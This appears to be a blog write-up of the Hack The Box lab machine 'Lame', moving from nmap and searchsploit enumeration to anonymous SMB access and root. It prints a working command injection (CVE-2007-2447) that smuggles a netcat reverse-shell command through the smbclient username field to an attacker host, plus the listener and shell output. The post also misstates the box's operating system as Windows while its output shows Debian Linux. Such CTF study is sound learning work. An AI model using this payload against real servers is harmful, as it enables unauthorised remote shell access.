Written by joelczk
on August 07, 2021

HTB - Lame

I’ve just completed Lame from HTB! In my opinion, Lame is an easy box that provides a quick introduction to the Windows Operating System. Here is a quick writeup about how I solved this box.

HTB - Lame

Box : Lame
IP Address : 10.10.10.3
Operating System : Windows

Remarks

While doing this box, I failed to realize that Samba has actually turned off SMBv1 support. Hence, I was met with a lot of connection errors when I attempted to pwn the box (And a lot of hair-tearing sessions!!)

Enumeration

As with any other box, let’s do a quick Nmap scan to identify the possible open ports. For this box, there is slight more open ports, 5 in fact - namely ports 21, 22, 139, 445 and 3632.

Port 21 belongs to an FTP server, port 22 belongs to an SSH server, port 3632 belongs to a distccd server while ports 139 and 445 belong to a netbios-ssn server. Both ports 139 and 445 uses Samba, but the main difference is the version of Samba used.

Firstly, we do a searchsploit for existing vulnerability to Port 21, and we discovered that vsftpd 2.3.4 running on Port 21 may be vulnearble to backdoor command execution.

------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remot | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote D | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote D | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service           | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution  | unix/remote/17491.rb
vsftpd 2.3.4 - Backdoor Command Execution  | unix/remote/49757.py
vsftpd 3.0.3 - Remote Denial of Service    | multiple/remote/49719.py
------------------------------------------- ---------------------------------

To verify this, we will scan for the vulnerability using Nmap. Sadly, this port doesn’t seem to be vulnerable to such a backdoor exploitation.

Exploitation

Noticing that Ports 139 and 445 uses Samba and also knowing that Samba is a SMB networking protocol. We will now try to connect to the SMB server using the SMBv1 protocol, reason being that SMBv1 has more vulnerabilities and attack vectors for us to try. One thing to note though is that Samba has actually turned off its SMBv1 support, so we would have to supply client min protocol=NT1 argument for it to work. At the same time, we also realize that we could log in to the server anonymously.

┌──(kali㉿kali)-[~]
└─$ smbclient -L 10.10.10.3 --option='client min protocol=NT1'
Enter WORKGROUP\kali's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME

Knowing that we can login to the Samba server without any credentials, we also found CVE 2007-2447 exploit from exploitdb that allows the username parameter to be injected to run command in the SMB server. This could then be used to create a reverse shell to the attacker’s machine.

To do so, we will first have to create a listener on the attacker’s machine

nc -nlvp 3000

Afterwards, all we have to do is to connect to the SMB client and send the metacharacters into the username with the reverse shell payload

┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.10.3/tmp                                           1 ⚙
Enter WORKGROUP\kali's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.16.250 3000`"
Password: 
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \>

Obtaining the system flag

Afterwards a connection will be received on the attacker’s machine. All we that is left to do is to stabilize the shell and obtain the system flag.

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nlvp 3000              
listening on [any] 3000 ...
connect to [10.10.16.250] from (UNKNOWN) [10.10.10.3] 49928
python -c 'import pty; pty.spawn("bash")'
root@lame:/# cd /root
cd /root
root@lame:/root# ls
ls
Desktop  reset_logs.sh  root.txt  vnc.log
root@lame:/root# cat root.txt
cat root.txt

← → Top